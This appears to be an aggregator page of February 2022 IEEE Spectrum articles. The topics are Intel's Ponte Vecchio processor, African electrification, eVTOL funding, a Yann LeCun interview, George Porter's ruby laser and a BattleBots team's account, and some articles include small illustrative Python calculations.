Monday, February 28, 2022

Tech Companies Help Defend Ukraine Against Cyberattacks

Ukraine War Tests the Power of Tech Giants

David Boggs, Co-Inventor of Ethernet, Dies at 71

Saturday, February 26, 2022

Russia Intensifies Censorship Campaign, Pressuring Tech Giants

Before Ukraine Invasion, Russia and China Cemented Economic Ties

What You Need to Know About Facial Recognition at Airports

Absent or Swinging Prices Keep Consumers Guessing

Friday, February 25, 2022

‘I’ll Stand on the Side of Russia’: Pro-Putin Sentiment Spreads Online

Behind Intel’s HPC Chip that Will Pierce the Exascale Barrier

On Monday, Intel unveiled new details of the processor that will power the Aurora supercomputer, which is designed to become one of the first U.S.-based high-performance computers (HPCs) to pierce the exaflop barrier: a billion billion high-precision floating point calculations per second. Intel Fellow Wilfred Gomes told engineers virtually attending the IEEE International Solid State Circuits Conference this week that the processor pushed Intel's 2D and 3D chiplet integration technologies to the limits.



The processor, called Ponte Vecchio, is a package that combines multiple compute, cache, networking, and memory silicon tiles, or "chiplets". Each of the tiles in the package is made using different process technologies, in a stark example of a trend called heterogeneous integration.

The result is that Intel packed 3,100 square millimeters of silicon (nearly equal to four Nvidia A100 GPUs) into a 2,330 mm² footprint. That's more than 100 billion transistors across 47 pieces of silicon.

Ponte Vecchio is made of multiple compute, cache, I/O, and memory tiles connected using 3D and 2D technology. Source: Intel

Ponte Vecchio is, among other things, a master class in 3D integration. Each Ponte Vecchio processor is really two mirror image sets of chiplets tied together using Intel's 2D integration technology Co-EMIB. Co-EMIB forms a bridge of high-density interconnects between two 3D stacks of chiplets. The bridge itself is a small piece of silicon embedded in a package’s organic substrate. The interconnect lines on silicon can be made narrower than on the organic substrate. Ponte Vecchio's ordinary connections to the package substrate were 100 micrometers apart, whereas they were nearly twice as dense in the Co-EMIB chip. Co-EMIB dies also connect high-bandwidth memory (HBM) and the Xe Link I/O chiplet to the "base silicon", the largest chiplet, upon which others are stacked.

The parts of Ponte Vecchio. Source: Intel



Each set of eight compute tiles, four SRAM cache chiplets called RAMBO tiles, and eight blank "thermal" tiles meant to remove heat from the processor is connected vertically to a base tile. This base provides cache memory and a network that allows any compute tile to access any memory.

Notably, these tiles are made using different manufacturing technologies, according to what suited their performance requirements and yield. The latter term, the fraction of usable chips per wafer, is particularly important in a chiplet integration like Ponte Vecchio, because attaching bad tiles to good ones means you've ruined a lot of expensive silicon. The compute tiles needed top performance, so they were made using TSMC's N5 (often called a 5-nanometer) process. The RAMBO tile and the base tile both used Intel 7 (often called a 7-nanometer) process. HBM, a 3D stack of DRAM, uses a completely different process than the logic technology of the other chiplets, and the Xe Link tile was made using TSMC's N7 process.

The different parts of the processor are made using different manufacturing processes, such as Intel 7 and TSMC N5. Intel's FOVEROS technology creates the 3D interconnects and its Co-EMIB makes horizontal connections. Source: Intel

The base die also used Intel's 3D stacking technology, called FOVEROS. The technology makes a dense array of die-to-die vertical connections between two chips. These connections are just 36 micrometers apart and are made by connecting the chips "face to face"; that is, the top of one chip is bonded to the top of the other. Signals and power get into this stack by means of through-silicon vias, fairly wide vertical interconnects that cut right through the bulk of the silicon. The FOVEROS technology used on Ponte Vecchio is an improvement over the one used to make Intel's Lakefield mobile processor, doubling the density of signal connections.

Expect the “zettascale” era of supercomputers to kick off sometime around 2028.

Needless to say, none of this was easy. It took innovations in yield, clock circuits, thermal regulation, and power delivery, Gomes said. In order to ramp performance up or down with need, each compute tile can run at a different voltage and clock frequency. The clock signals originate in the base die, but each compute tile can run at its own rate. Providing the voltage was even more complicated. Intel engineers chose to supply the processor with a higher-than-normal voltage (1.8 volts); because delivering the same power at a higher voltage requires less current, this let them simplify the package structure. Circuits in the base tile reduce the voltage to something closer to 0.7 volts for use on the compute tiles, and each compute tile had to have its own power domain in the base tile. Key to this ability were new high-efficiency inductors called coaxial magnetic integrated inductors. Because these are built into the package substrate, the circuit actually snakes back and forth between the base tile and the package before supplying the voltage to the compute tile.
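The benefit of the higher input voltage follows from the relation P = V × I: for the same power, a higher voltage means proportionally less current through the package connections. The sketch below is a rough illustration only. It assumes that the full 600-watt design power quoted elsewhere in this article is delivered at a single voltage, and it ignores conversion losses; the function name `supply_current_amps` is hypothetical and does not come from Intel.

```python
def supply_current_amps(power_watts: float, voltage_volts: float) -> float:
    """Return the current (in amperes) needed to deliver a power at a voltage: I = P / V."""
    if voltage_volts <= 0:
        raise ValueError("voltage must be positive")
    return power_watts / voltage_volts


# Assumption: treat the whole 600 W package power as one lossless load.
PACKAGE_POWER_W = 600.0
INPUT_VOLTAGE_V = 1.8   # voltage supplied to the package
TILE_VOLTAGE_V = 0.7    # approximate voltage used on the compute tiles

current_at_input = supply_current_amps(PACKAGE_POWER_W, INPUT_VOLTAGE_V)
current_at_tile = supply_current_amps(PACKAGE_POWER_W, TILE_VOLTAGE_V)

print(f"Current at {INPUT_VOLTAGE_V} V: {current_at_input:.0f} A")
print(f"Current at {TILE_VOLTAGE_V} V: {current_at_tile:.0f} A")
print(f"Ratio: {current_at_tile / current_at_input:.2f}x")
```

Under these assumptions, bringing power in at 1.8 volts takes roughly 333 amperes, versus roughly 857 amperes at 0.7 volts, so the package has to carry about 2.6 times less current.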

Getting the heat out of a complex 3D stack of chips was no easy feat. Source: Intel



Ponte Vecchio is meant to consume 600 watts, so making sure heat could be extracted from the 3D stack was always a high priority. Intel engineers used tiles that had no other function than to draw heat away from the active chiplets in the design. They also coated the top of the entire chiplet agglomeration in heat-conducting metal, despite the various parts having different heights. Atop that was a solder-based thermal interface material (STIM), and an integrated heat spreader. The different tiles each have different operating-temperature limits under liquid cooling and air cooling, yet this solution managed to keep them all in range, said Gomes.

"Ponte Vecchio started with a vision that we wanted democratize computing and bring petaflops to the mainstream," said Gomes. Each Ponte Vecchio system is capable of more than 45 trillion 32-bit floating point operations per second (teraflops). Four such systems fit together with two Sapphire Rapids CPUs in a complete compute system. These will be combined for a total exceeding 54,000 Ponte Vecchios and 18,000 Sapphire Rapids to form Aurora, a machine targeting 2 exaflops.

It's taken 14 years to go from the first petaflop supercomputers in 2008—capable of one million billion calculations per second—to exaflops today, Gomes pointed out. A 1000-fold increase in performance "is a really difficult task, and it's taken multiple innovations across many fields," he said. But with improvements in manufacturing processes, packaging, power delivery, memory, thermal control, and processor architecture, Gomes told engineers, the next 1000-fold increase could be accomplished in just six years rather than another 14.
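To put the two timelines side by side, the 1000-fold gain can be converted into an equivalent yearly growth factor and a doubling time. This is a minimal sketch that assumes smooth compound growth, which real supercomputer performance does not follow exactly; the helper names `annual_growth_factor` and `doubling_time_years` are hypothetical.

```python
import math


def annual_growth_factor(total_gain: float, years: float) -> float:
    """Yearly multiplier that compounds to total_gain over the given number of years."""
    return total_gain ** (1.0 / years)


def doubling_time_years(total_gain: float, years: float) -> float:
    """Time needed to double performance at that same compound rate."""
    return years * math.log(2) / math.log(total_gain)


for span_years in (14, 6):
    factor = annual_growth_factor(1000, span_years)
    doubling = doubling_time_years(1000, span_years)
    print(f"1000x in {span_years} years: {factor:.2f}x per year, "
          f"doubling every {doubling:.2f} years")
```

Under this assumption, 14 years corresponds to about a 1.64-fold improvement per year (doubling roughly every 1.4 years), while six years would require about a 3.16-fold improvement per year (doubling roughly every 0.6 years).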

Reference: https://ift.tt/3f2ODrj

‘I’ll Stand on the Side of Russia’: Pro-Putin Sentiment Spreads Online

Thursday, February 24, 2022

Africa’s Electricity-Access Problem Is Worse Than You Think

We measure access to electricity no better than we do the rate of literacy. Both are easy to define—a population’s share connected to the national grid or to a local source of electricity, and the ability to read and write—but such definitions do not make it possible to get a truly informed verdict. There is an enormous difference between the hesitant reading of a simple text and the comprehension of classics in any language, and between filling out vital information on a short questionnaire and writing lengthy polemic essays.

Similarly, having a distribution line (often illegally rigged) running to a dwelling tells us nothing about the usage of power or the reliability of its supply. Knowing how many solar panels are on a roof informs us about the maximum possible rate of local generation but not about the annual capacity factor or about the final uses of generated electricity. Therefore, to understand the progress of electrification, we need to augment the rate of nationwide access with information on the urban-rural divide and on actual per capita consumption.

Global electrification has risen steadily since World War II, reaching 73 percent in 2000 and 90 percent in 2019 (the pandemic year of 2020 was the first year in decades when the rate did not go up). This means that in 2019 about 770 million people had no electricity, three-quarters of them in Africa.

Nighttime satellite images show that the heart of the continent remains in darkness: electrification rates are less than 5 percent in Chad and the Central African Republic, and the rates remain below 50 percent in such populous countries as Angola, Ethiopia, Mozambique, and Sudan. Even South Africa, by far the best-supplied country south of the Sahara, suffers from frequent blackouts.

The urban-rural divide has been eliminated in North Africa’s Arab countries, but it remains wide in sub-Saharan Africa, where 78 percent of urban populations but only 28 percent of rural inhabitants have connections. Even countries that have seen recent economic progress have the problem—the urban to rural breakdown is 71 to 32 percent in Uganda and 92 to 24 percent in Togo.

For purposes of comparison with rates in affluent countries I will leave out the top per capita consumers (from Iceland’s 50,000 kilowatt-hours per year to Canada’s 14,000 kWh/year). Instead, I will use the rate of 6,000 kWh/year, which is the unweighted mean for the European Union’s four largest economies—Germany, France, Italy, Spain—and Japan.

Only North Africa has consumption rates of the same order of magnitude. Egypt, for instance, is at about 1,500 kWh/year, or a quarter of the affluent rate. Nigeria’s rate (about 115 kWh/year) is an order of magnitude lower, and there are many countries (Burundi, Central African Republic, Chad, Ethiopia, Guinea, Niger, Somalia, South Sudan) where the mean is below or just around 50 kWh/year, or less than 1 percent of the affluent rate.

What does 50 kWh/year deliver? A 60-watt light switched on for a little over 2 hours a day, or one 60-W light, a small TV (25 W), and a small table fan (30 W) concurrently on for about an hour and 10 minutes. All too obviously, real access to electricity in large parts of Africa is akin to where the United States was during the late 1890s.
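The arithmetic behind these figures can be checked with a short calculation. The sketch below assumes a 365-day year and constant loads at the wattages given in the text; the function name `daily_hours_of_use` is hypothetical.

```python
DAYS_PER_YEAR = 365


def daily_hours_of_use(annual_kwh: float, load_watts: float) -> float:
    """Hours per day that a constant load can run on a given annual energy budget."""
    daily_watt_hours = annual_kwh * 1000 / DAYS_PER_YEAR
    return daily_watt_hours / load_watts


ANNUAL_KWH = 50            # low-end per capita consumption cited in the text
AFFLUENT_KWH = 6000        # comparison rate used in the text

light_only = daily_hours_of_use(ANNUAL_KWH, 60)
light_tv_fan = daily_hours_of_use(ANNUAL_KWH, 60 + 25 + 30)
share_of_affluent = ANNUAL_KWH / AFFLUENT_KWH

print(f"60 W light alone: {light_only:.2f} hours per day")
print(f"Light + TV + fan (115 W): {light_tv_fan * 60:.0f} minutes per day")
print(f"Share of the affluent rate: {share_of_affluent:.2%}")
```

With these inputs, the light alone runs about 2.3 hours a day, the three devices together run about 71 minutes a day, and 50 kWh/year works out to roughly 0.8 percent of the 6,000 kWh/year benchmark.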

This article appears in the March 2022 print issue as “Africa’s Access to Electricity.”

Reference: https://ift.tt/2vVtf3u

Wednesday, February 23, 2022

Can a Reality TV Show Sell You on a $2,298 E-Bike?

Tuesday, February 22, 2022

EVTOL Companies Are Worth Billions—Who Are the Key Players?

“Hardware is hard,” venture capitalist Marc Andreessen famously declared at a tech investors’ event in 2013. Explaining the longstanding preference for software startups among VCs, Andreessen said, “There are so many more things that can go wrong in a hardware company. There are so many more ways a hardware company can blow up in a nonrecoverable way.”

Even as Andreessen was speaking, however, the seeds were being sown for one of the biggest and most sustained infusions of cash into a hardware-based movement in the last decade. Since then, the design and construction of electric vertical-takeoff-and-landing (eVTOL) aircraft has been propelled by waves of funding from some of the biggest names in tech. And, surprisingly for such a large movement, the funding is mostly coming from sources outside of the traditional venture-capital community—rich investors and multinational corporations. The list includes Google cofounder Larry Page, autonomy pioneer Sebastian Thrun, entrepreneur Martine Rothblatt, LinkedIn cofounder Reid Hoffman, Zynga founder Mark Pincus, investor Adam Grosser, entrepreneur Marc Lore, and companies including Uber, Mercedes-Benz, Airbus, Boeing, Toyota, Hyundai, Honda, JetBlue, American Airlines, Virgin Atlantic, and many more.

Today, some 250 companies are working toward what they hope will be a revolution in urban transportation. Some, such as Wisk, Kittyhawk, and Joby, are flying a small fleet of prototype aircraft; others have nothing more than a design concept. If the vision becomes reality, hundreds of eVTOLs will swarm over the skies of a big city during a typical rush hour, whisking small numbers of passengers at per-kilometer costs no greater than those of driving a car. This vision, which goes by the name urban air mobility or advanced air mobility, will require backers to overcome entire categories of obstacles, including certification, technology development, and the operational considerations of safely flying large numbers of aircraft in a small airspace.

Even tech development, considered the most straightforward of the challenges, has a way to go. Joby, one of the most advanced of the startups, provided a stark reminder of this fact when it was disclosed on 16 February that one of its unpiloted prototypes crashed during a test flight in a remote part of California. Few details were available, but reporting by FutureFlight suggested the aircraft was flying test routes at altitudes up to 1,200 feet and at speeds as high as 240 knots.

No one expects the urban air mobility market, if it does get off the ground, to ever be large enough to accommodate 250 manufacturers of eVTOLs, so a cottage industry has sprung up around handicapping the field. SMG Consulting (founded by Sergio Cecutta, a former executive at Honeywell and Danaher) has been ranking eVTOL startups in its Advanced Air Mobility Reality Index since December 2020. Its latest index (from which our chart below has been adapted, with SMG’s kind permission) suggests that the top 10 startups have pulled in more than US $6 billion in funding; the next couple of hundred startups have combined funding of several hundred million dollars at most.

Cecutta is quick to point out that funding, though important, is not everything when it comes to ranking the eVTOL companies. How they will navigate the largely uncharted territory of certifying and manufacturing the novel fliers will also be critical. “These companies are all forecasting production in the hundreds, if not thousands” of units per year, he says.

“The aerospace industry is not used to producing in those kinds of numbers….The challenge is to be able to build at that rate, to have a supply chain that can supply you with the components you need to build at that rate. Aerospace is a team sport. There is no company that does 100 percent in-house.” Hardware really is hard.

Yann LeCun: AI Doesn't Need Our Supervision

When Yann LeCun gives talks, he's apt to include a slide showing a famous painting of a scene from the French Revolution. Superimposed over a battle scene are these words: THE REVOLUTION WILL NOT BE SUPERVISED.

LeCun, VP and chief AI scientist of Meta (formerly Facebook), believes that the next AI revolution will come about when AI systems no longer require supervised learning. No longer will they rely on carefully labeled data sets that provide ground truth in order for them to gain an understanding of the world and perform their assigned tasks. AI systems need to be able to learn from the world with minimal help from humans, LeCun says. In an email Q&A with IEEE Spectrum, he talked about how self-supervised learning can create more robust AI systems imbued with common sense.

He’ll be exploring this theme tomorrow at a virtual Meta AI event titled, Inside the Lab: Building for the Metaverse With AI. That event will feature talks by Mark Zuckerberg, a handful of Meta’s AI scientists, and a discussion between LeCun and Yoshua Bengio about the path to human-level AI.

Yann LeCun. Courtesy Yann LeCun

You’ve said that the limitations of supervised learning are sometimes mistakenly seen as intrinsic limitations of deep learning. Which of these limitations can be overcome with self-supervised learning?

Yann LeCun: Supervised learning works well on relatively well-circumscribed domains for which you can collect large amounts of labeled data, and for which the type of inputs seen during deployment are not too different from the ones used during training. It’s difficult to collect large amounts of labeled data that are not biased in some way. I’m not necessarily talking about societal bias, but about correlations in the data that the system should not be using. A famous example of that is when you train a system to recognize cows and all the examples are cows on grassy fields. The system will use the grass as a contextual cue for the presence of a cow. But if you now show a cow on a beach, it may have trouble recognizing it as a cow.

Self-supervised learning (SSL) allows us to train a system to learn good representations of the inputs in a task-independent way. Because SSL training uses unlabeled data, we can use very large training sets, and get the system to learn more robust and more complete representations of the inputs. It then takes a small amount of labeled data to get good performance on any supervised task. This greatly reduces the necessary amount of labeled data [endemic to] pure supervised learning, and makes the system more robust, and more able to handle inputs that are different from the labeled training samples. It also sometimes reduces the sensitivity of the system to bias in the data, an improvement about which we’ll share more of our insights in research to be made public in the coming weeks.

What’s happening now in practical AI systems is that we are moving towards larger architectures that are pre-trained with SSL on large amounts of unlabeled data. These can be used for a wide variety of tasks. For example, Meta AI now has language translation systems that can handle a couple hundred languages. It’s a single neural net! We also have multilingual speech recognition systems. These systems can deal with languages for which we have very little data, let alone annotated data.

Other leading figures have said that the way forward for AI is improving supervised learning with better data labeling. Andrew Ng recently talked to me about data-centric AI, and Nvidia’s Rev Lebaredian talked to me about synthetic data that comes with all the labels. Is there division in the field about the path forward?

LeCun: I don’t think there is a philosophical division. SSL pre-training is very much standard practice in NLP. It has shown excellent performance improvements in speech recognition, and it’s starting to become increasingly useful in vision. Yet, there are still many unexplored applications of "classical" supervised learning, such that one should certainly use synthetic data with supervised learning whenever possible. That said, Nvidia is actively working on SSL.

Back in the mid-2000s Geoff Hinton, Yoshua Bengio, and I were convinced that the only way we would be able to train very large and very deep neural nets was through self-supervised (or unsupervised) learning. This is when Andrew Ng started being interested in deep learning. His work at the time also focused on methods that we would now call self-supervised.

How could self-supervised learning lead to AI systems with common sense? How far can common sense take us toward human-level intelligence?

LeCun: I think significant progress in AI will come once we figure out how to get machines to learn how the world works like humans and animals do: mostly by watching it, and a bit by acting in it. We understand how the world works because we have learned an internal model of the world that allows us to fill in missing information, predict what’s going to happen, and predict the effects of our actions. Our world model enables us to perceive, interpret, reason, plan ahead, and act. How can machines learn world models?

This comes down to two questions: What learning paradigm should we use to train world models? And what architecture should world models use? To the first question, my answer is SSL. An instance of that would be to get a machine to watch a video, stop the video, and get the machine to learn a representation of what’s going to happen next in the video. In doing so, the machine may learn enormous amounts of background knowledge about how the world works, perhaps similarly to how baby humans and animals learn in the first weeks and months of life.

To the second question, my answer is a new type of deep macro-architecture that I call Hierarchical Joint Embedding Predictive Architecture (H-JEPA). It would be a bit too long to explain here in detail, but let’s just say that instead of predicting future frames of a video clip, a JEPA learns abstract representations of the video clip and the future of the clip so that the latter is easily predictable based on its understanding of the former. This can be made to work using some of the latest developments in non-contrastive SSL methods, particularly a method that my colleagues and I recently proposed called VICReg (Variance, Invariance, Covariance Regularization).

A few weeks ago, you responded to a tweet from OpenAI’s Ilya Sutskever in which he speculated that today’s large neural networks may be slightly conscious. Your response was a resounding “Nope.” In your opinion, what would it take to build a neural network that qualifies as conscious? What would that system look like?

LeCun: First of all, consciousness is a very ill-defined concept. Some philosophers, neuroscientists, and cognitive scientists think it’s a mere illusion, and I’m pretty close to that opinion.

But I have a speculation about what causes the illusion of consciousness. My hypothesis is that we have a single world model "engine" in our pre-frontal cortex. That world model is configurable to the situation at hand. We are at the helm of a sailboat, our world model simulates the flow of air and water around our boat; we build a wooden table, our world model imagines the result of cutting pieces of wood and assembling them, etc. There needs to be a module in our brains, that I call the configurator, that sets goals and subgoals for us, configures our world model to simulate the situation at hand, and primes our perceptual system to extract the relevant information and discard the rest. The existence of an overseeing configurator might be what gives us the illusion of consciousness. But here is the funny thing: We need this configurator because we only have a single world model engine. If our brains were large enough to contain many world models, we wouldn't need consciousness. So, in that sense, consciousness is an effect of the limitation of our brain!

What role will self-supervised learning play in building the metaverse?

LeCun: There are many specific applications of deep learning for the metaverse, some of which are things like motion tracking for VR goggles and AR glasses, capturing and resynthesizing body motion and facial expressions, etc.

There are large opportunities for new AI-powered creative tools that will allow everyone to create new things in the Metaverse, and in the real world too. But there is also an "AI-complete" application for the Metaverse: virtual AI assistants. We should have virtual AI assistants that can help us in our daily lives, answer any question we have, and help us deal with the deluge of information that bombards us every day. For that, we need our AI systems to possess some understanding of how the world works (physical or virtual), some ability to reason and plan, and some level of common sense. In short, we need to figure out how to build autonomous AI systems that can learn like humans do. This will take time. But Meta is playing a long game here.

Reference: https://ift.tt/4UxH1BQ

Big Tech Makes a Big Bet: Offices Are Still the Future

Friday, February 18, 2022

With this Ruby Laser, George Porter Sped up Photochemistry

When the future Nobel-winning chemist George Porter arrived as a Ph.D. student in chemistry at the University of Cambridge in 1945, he found the equipment there “remarkably primitive,” as he told an interviewer in later life. “One made one’s own oscilloscopes.”

Porter’s adviser, Ronald G.W. Norrish, ran a lab within the Cavendish Laboratory that had its share of jerry-rigged equipment, and he assigned Porter a problem: Establish a technique for detecting the short-lived molecules known as free radicals. Porter already knew a fair amount about not just chemistry but also physics and electronics. He’d spent most of the war with the British navy working on applying pulse techniques to radar.

Porter began by investigating the methylene (CH₂) radical, using the lab’s surplus army searchlight. It ran on 110 volts DC supplied by a large army diesel engine that sat on the back of a truck parked outside. One of Porter’s jobs was to hand start the engine on cold winter mornings.

Detecting free radicals was no mean feat, as they typically exist for milliseconds or less. At the time, chemists barely used the word millisecond. At a science conference in September 1947, the prominent chemist Harry Melville stated that specimens with lifetimes of less than a millisecond were far beyond direct physical measurement. Porter and Norrish were about to prove him wrong.

George Porter’s flash of insight at a lighting factory

On a trip to collect a mercury arc lamp for the searchlight, Porter saw flash lamps being made at a Siemens factory. The figurative lightbulb turned on. He realized that flash lamps, combined with the pulse techniques he’d learned as a wartime radar officer, could be applied to his current problem. In the lab, they had been using a continuous light source without much success. Porter reasoned that they could use a more intense pulse of light to excite the sample and create the free radicals, and then use further flashes to record the decay. He began experimenting and soon developed the technique he dubbed flash photolysis. It reset the time scale for chemistry and revolutionized the field.

After completing his thesis, “The Study of Free Radicals Produced by Photochemical Means” in 1949, Porter stayed on at Cambridge, first as a demonstrator and then as the assistant director of research in the Department of Physical Chemistry. In 1954 he left Cambridge to become assistant director of the British Rayon Research Association, but he soon realized he was better suited to academia than industry. The following year he became the first professor of physical chemistry at the University of Sheffield.

After Theodore Maiman [shown here] invented the ruby laser in 1960, George Porter immediately realized this laser would be ideal for his research and set about acquiring one. Bettmann/Getty Images

Porter’s research into ever-faster chemical reactions easily progressed from milliseconds to microseconds, but then things stalled. He needed a faster light source. When Theodore Maiman demonstrated a laser at Hughes Research Laboratories, in California, in 1960, Porter immediately realized it was the light source he’d been waiting for. Britain was behind the United States when it came to laser research, and it took time to acquire such an expensive piece of equipment.

Once Porter had his ruby laser [pictured at top and now on exhibit at the Royal Institution], he lost no time in pushing his research into the nanosecond and picosecond region. In 1967, Porter and Norrish along with the German chemist Manfred Eigen were awarded the Nobel Prize in Chemistry, for their studies of “extremely fast chemical reactions, effected by disturbing the equilibrium by means of very short pulses of energy.”

George Porter accepts the Nobel Prize in Chemistry on 12 December 1967. Keystone Press/Alamy

Later in his career, Porter moved to Imperial College London, where he had access to more advanced lasers and was eventually able to capture events in the femtosecond range—12 orders of magnitude faster than during his doctoral studies at Cambridge. Flash photolysis is still used to study semiconductors, nanoparticles, and photosynthesis, among other things.

Porter viewed his contributions to photochemistry as essential to the future of the planet. As he told an interviewer in 1975, “Our future, both from a food and an energy point of view, may well have to depend largely on photochemistry applied to solar energy. The only alternative is nuclear energy, which certainly has its problems, and it would be wise to have something else up our sleeves.”

How George Porter became a popular popularizer of science

Porter wasn’t just interested in pushing the boundaries of science. In 1960, he began giving the occasional public lecture at the Royal Institution, in London, filling in for speakers at the last minute. This eventually led to his appointment as a professor of chemistry at the RI, a part-time post with a tenure of three years that consisted of giving a public lecture and a few school lectures each year. This arrangement allowed Porter to develop a relationship with the institution while keeping his position at Sheffield.

In 1966 Porter became director of the RI’s Davy-Faraday Research Laboratory, otherwise known as the DFRL, and permanently moved his research from Sheffield to the institution. He was also named the Fullerian Professor of Chemistry and the overall director of the Royal Institution. The Science Research Council provided Porter with funds to support a research group of approximately 20 people, and he spent the next two decades at the RI as an active researcher, as well as a popularizer of science. He excelled in both roles.

The late 1950s and early 1960s saw intense public and academic discussions about science education and science literacy. In a series of provocative newspaper articles and a 1959 lecture at Cambridge entitled “The Two Cultures,” the novelist and physical chemist C.P. Snow argued that the British educational system favored the humanities over science and engineering. He stoked outrage by asking educated individuals if they could describe the second law of thermodynamics, which he believed was the equivalent of being able to quote Shakespeare. Academics and public intellectuals from both the humanities and the sciences took up the debate, some earnestly, others with derision.

Porter deftly threaded the needle of this debate by slightly reframing the analogy. Instead of Shakespeare, Porter used Beethoven. He argued that anyone could appreciate the music, but only a musician who had studied intensively could fully interpret it. Similarly, it might take years of specialized study to derive intellectual satisfaction from the second law of thermodynamics, but people needed only a few building blocks to get the gist of the physics. Porter chose to bridge the cultural divide with a commitment to explain science to nonspecialists.

As if to prove his point about thermodynamics, Porter wrote and presented a 10-part TV series called “The Laws of Disorder” for the BBC. (He had already established himself as an excellent science communicator in an episode of the BBC’s “Eye on Research.”) In this episode, he tackled the second law head on:

The Second Law of Thermodynamics - Entropy www.youtube.com

According to historian Rupert Cole in his 2015 article “The Importance of Picking Porter,” managers at the Royal Institution recognized Porter’s ability to engage with the “Two Cultures” discourse and to explain basic science in an accessible manner when they selected him as director.

One of the RI’s great traditions was to explain science to the public. Porter regarded the institution’s theater as the London repertory theater of science. Under his leadership, the institution welcomed school children and laypeople to learn about the latest developments in science. He also insisted that speakers use demonstrations to help explain their work. At the end of his tenure there, he recorded a number of famous experiments. He also worked with BBC television to broadcast the Christmas Lectures. In this clip, Porter demonstrates how to make nylon:

How Nylon Was Discovered - Christmas Lectures with George Porter www.youtube.com

The Christmas Lectures, which continue to this day, had been started by Michael Faraday in 1825. Porter firmly believed that Faraday would have appeared on television regularly if the technology had existed during his time.

I like to think that George Porter would approve of my Past Forward columns and my attempt to bring museum objects, history, and technology to an interested public. Porter was a firm proponent of scientists communicating their work to nonspecialists. He also thought that the scientific community should appreciate efforts to popularize their work. I suspect that Porter, who died in 2002, would have loved social media and the public debates it can inspire. I have no doubt he would be trending with his own hashtag.

Part of a continuing series looking at photographs of historical artifacts that embrace the boundless potential of technology.

An abridged version of this article appears in the March 2022 print issue as “The Nobelist’s First Laser.”

Reference: https://ift.tt/BDxjgbC

BattleBots: Coping with Carnage





If you haven't seen last night's episode of Discovery's BattleBots yet, you might want to stop reading this until later because (spoiler alert) we got destroyed. Poor Ghost Raptor faced off against the Robotic Death Company's Cobalt and was left in dismembered pieces on the floor of the arena. Now that the fight has aired, and the smoke has (literally) cleared, we can tell you about what happens during and after the combat (to find out how BattleBots is set up, and how teams prepare, check out my earlier Spectrum guest post).

The first thing to know is that although there have been several weeks between the airing of our fight with Glitch and last night's bout, in reality these two brawls occurred on the same day. The fight against Glitch happened at 10 am, and the fight against Cobalt was at 7 pm that evening. Between the time it took to get back to the Pit and the time needed to check out the robot with the BattleBots folks before the next round, Team Raptor was left with less than 7 hours to try to repair the damage from our first battle.

To be fair to the BattleBots producers, this compressed timeframe wasn't their original intent, but was due to problems in getting Glitch ready (which ultimately led to Raptor captain Chuck Pitzer helping them out in the Pit) that pushed the two rounds together. The rookie team behind Glitch are such sweethearts, and we really bonded with them on set. But in reality it caused us a four-day delay. And Glitch left us with quite a bit of damage. They busted our weapons and electronic components and took a bite out of the side of the bot. We needed to swap a bunch of things out, and even machine some new parts, and we sadly had to lose our flamethrower. Mercifully, as I mentioned in my previous post, the Pit and surrounding tents are amazingly well equipped for this kind of work. Chuck was mostly to be found in the welding tent, which had all kinds of cool welding tools sponsored by Lincoln Electric, while the others were running around working on a new configuration optimized against Cobalt.

We were already quite tired: I had slept only 3 hours the night before, and the fatigue may have led to us making an important mistake. When you create a new configuration, you need to watch how it affects the weight of your robot, as it cannot exceed 114 kilograms. Knowing Cobalt's weapon, a heavy vertical spinner, we chose to put a beefier (and thus also heavier) blade on Ghost Raptor's horizontal spinner, and with all the custom protective parts that Chuck was welding, we totally forgot to recheck the new weight. So once we loaded Ghost Raptor up with its LiPo batteries in the battery tent, and went for the official weigh-in, it turned out she was well overweight.

We were already being called into the arena to get in line, so we needed to decide fast: a lighter blade? Less protection? We were racing against time at that point. We took off some of the protective front parts and had to remove one of the pair of forward projecting forks, so that is actually the reason Ghost Raptor went onto the battle grounds with just one, which I thought looked kind of hilarious.

The fight itself was very dramatic—and I guess made for good TV. I remember us entering and the fight starting. Early on, we were in control thanks to Chuck's driving and at one point we were dominant, but a few moments later we were getting scooped up and thrown into the wall by Matt Maxham, Cobalt's driver. Oops! And then there was a big explosion. Chuck is a great driver, and Ghost Raptor is a beautiful machine, but fragile when hit in the wrong parts. And Cobalt is just such a killer. Now, here Ghost Raptor was, her insides all torn out over the arena as white smoke curled and dripped out around her.

What a beautiful mess. For me, normally seeing lithium batteries fail like this would be super bad, as I work on wearable technologies. I felt a little like a rubbernecker at an accident, ogling Ghost Raptor's death throes. It might have been from the lack of sleep, but I could not take my eyes off it; it was so mesmerizing. Moments later on screen you see a man emerge onto the arena floor with a large flexible smoke ventilation tube and a fire extinguisher to put an end to the spectacle: this was actually Trey Roski, one of the founders of BattleBots.

We gathered up the scattered parts that we had lovingly put together and brought Ghost Raptor back to the Pit. To get her back in fighting condition for more shenanigans, there was actually no better place than the Pit, with all its equipment. We looked at the pile of parts on the cart and all I can remember is us all just bursting out laughing over the situation. Even the bigger parts were bent. It looked like robot spaghetti, just a bunch of junk. Did we even have enough spare parts to rebuild it?

We separated out all the useful pieces we could, working in the rough 41 °C Vegas desert heat. Some parts we could use there and then, others would go back for post-show reconditioning work we just didn't have time for. In the end we were able to recover about 35 percent of the parts we needed. Some of the scrap was given away as mementos, but a lot of it went to BattleBots' on-site artist, David Fay. David used scrap from broken robots to make a really beautiful Trojan horse sculpture for a charity fundraiser.

During this time, Matt, Cobalt's driver, came over to say sorry for completely annihilating Ghost Raptor, and brought a signed piece of Cobalt with him. Apparently we had at least taken a bite out of it mid-fight! But for us, the long day was finally over. We did a final review of the parts we had left, and then headed off to take a shower and jump in the pool of the hotel, where we discussed our rebuilding strategy for the next day. I slept pretty well that night, with the explosion still in my head, and all that had happened. It felt like a huge relief, and wild in a weird way!

Photo captions: On the Offense; K.O.!; Robot Spaghetti; Humpty Dumpty; War Trophy

Reference: https://ift.tt/LgImHCq

Video Friday: Robotics After Hours

Video Friday is your weekly selection of awesome robotics videos, collected by your friends at IEEE Spectrum robotics. We’ll also be posting a weekly calendar of upcoming robotics events for the next few months; here's what we have so far (send us your events!):

ICRA 2022: 23–27 May 2022, Philadelphia

ERF 2022: 28–30 June 2022, Rotterdam, the Netherlands

CLAWAR 2022: 12–14 September 2022, Açores, Portugal

Let us know if you have suggestions for next week, and enjoy today's videos.

Boston Dynamics put together a behind the scenes video of sorts about the Super Bowl commercial they did in collaboration with some beer company or other.

One thing that low-key bugged me about this is how in the behind-the-scenes footage, it's obvious how much separation exists between the actors and the Atlas robots, while in the actual commercial, it looks like the humans and robots spend a lot of time right next to each other.

[ Boston Dynamics ]

